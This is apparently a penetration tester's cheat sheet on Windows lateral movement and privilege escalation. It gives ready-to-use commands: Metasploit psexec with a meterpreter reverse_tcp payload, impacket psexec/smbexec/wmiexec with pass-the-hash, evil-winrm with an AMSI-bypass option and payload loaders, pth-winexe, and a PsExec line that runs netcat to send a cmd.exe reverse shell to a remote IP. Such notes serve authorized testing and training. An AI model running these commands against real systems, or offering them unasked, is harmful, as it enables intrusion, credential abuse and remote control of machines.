privesc tools

check if win-logon-creds are working

msf

use exploit/windows/smb/psexec
- set PAYLOAD windows/x64/meterpreter/reverse_tcp
- SHOW TARGETS > set TARGET X
use exploit/windows/smb/psexec_psh

Note: psexec & evil-winrm uses port 5985 (powershell remote access)

psexec | smbexec | wmiexec

NOTE: psexec, smbexec will give SYSTEM shell. wmiexec will give user shell.

impacket-psexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]
impacket-smbexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]
impacket-wmiexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]

evil-winrm

NOTE: evil-winrm usually gives medium integrity shells for added administrator accounts. Even if new account has Administrator permissions, cannot actually perform administrative actions with it.

# only USER, no DOMAIN needed
evil-winrm -i IP -u USER [-H NT-HASH | -p PASS]

# custom options
PS> menu
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download

winexe

winexe -U 'DOMAIN/USER%PASS' //IP cmd.exe

pth-winexe

pth-winexe -U 'DOMAIN/USER%HASH' //IP cmd.exe
# --system needs local admin hash
pth-winexe [--system] -U 'administrator%NTLM:HASH' //IP cmd.exe

PsExec.exe

PS> .\PsExec64.exe -accepteula -i -s SHELL.exe
# i: Run process interactively
# s: Run remote process in the System account.

> PSExec64.exe -i -u "nt authority\local service" SHELL.exe
# u: Run process as user-account <>

# Run executable with a different user:pass
PS> .\PsExec.exe -accepteula -u USER -p PASS nc.exe IP PORT -e cmd.exe

Previouswindows-privilege-escalation Nextsteal NTLM creds

Last updated 2 years ago